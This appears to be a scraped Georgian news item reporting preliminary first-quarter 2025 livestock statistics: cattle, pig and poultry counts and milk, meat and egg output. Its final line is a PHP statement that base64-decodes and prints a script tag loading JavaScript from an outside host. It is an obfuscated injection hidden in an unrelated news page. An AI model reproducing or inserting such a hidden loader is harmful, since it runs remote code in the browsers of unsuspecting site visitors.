gorgia
ავერსი jaluzi

 სტატისტიკის ეროვნული სამსახურის წინასწარი მონაცემებით, 2025 წლის I კვარტლის ბოლოსთვის, მსხვილფეხა რქოსანი პირუტყვის სულადობა წინა წლის შესაბამის მაჩვენებელთან შედარებით 4.9%-ით შემცირდა და 861.1 ათასი სული შეადგინა.

მათივე ცნობით, აქედან, ფურისა და ფურკამეჩის ჯამური რაოდენობა 396.3 ათასი სულით განისაზღვრა, რაც წინა წლის შესაბამისი მაჩვენებელს 4.3%-ით ჩამორჩება.

„ღორის რაოდენობა 152.0 ათასი სულით განისაზღვრა, რაც 2.2%-ით ნაკლებია წინა წლის შესაბამის მაჩვენებელზე. ფრინველის რაოდენობა წინა წლის ანალოგიურ მაჩვენებელთან შედარებით 11.3%-ით გაიზარდა და 8.5 მილიონი ფრთა შეადგინა.

წინასწარი მონაცემებით, 2025 წლის I კვარტალში რძის წარმოებამ 108.5 მილიონი ლიტრი შეადგინა, რაც წინა წლის ანალოგიურ მაჩვენებელზე 3.4%-ით ნაკლებია. ხორცის წარმოებამ 17.5 ათასი ტონა შეადგინა, რაც 2024 წლის შესაბამის პერიოდის მაჩვენებელზე 6.4%-ით ნაკლებია.

საანგარიშო პერიოდის განმავლობაში წარმოებულია 172.0 მილიონი კვერცხი, რაც წინა წლის ანალოგიურ მაჩვენებელზე 2.2%-ით მეტია”, - აღნიშნულია გავრცელებულ ინფორმაციაში.

124
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");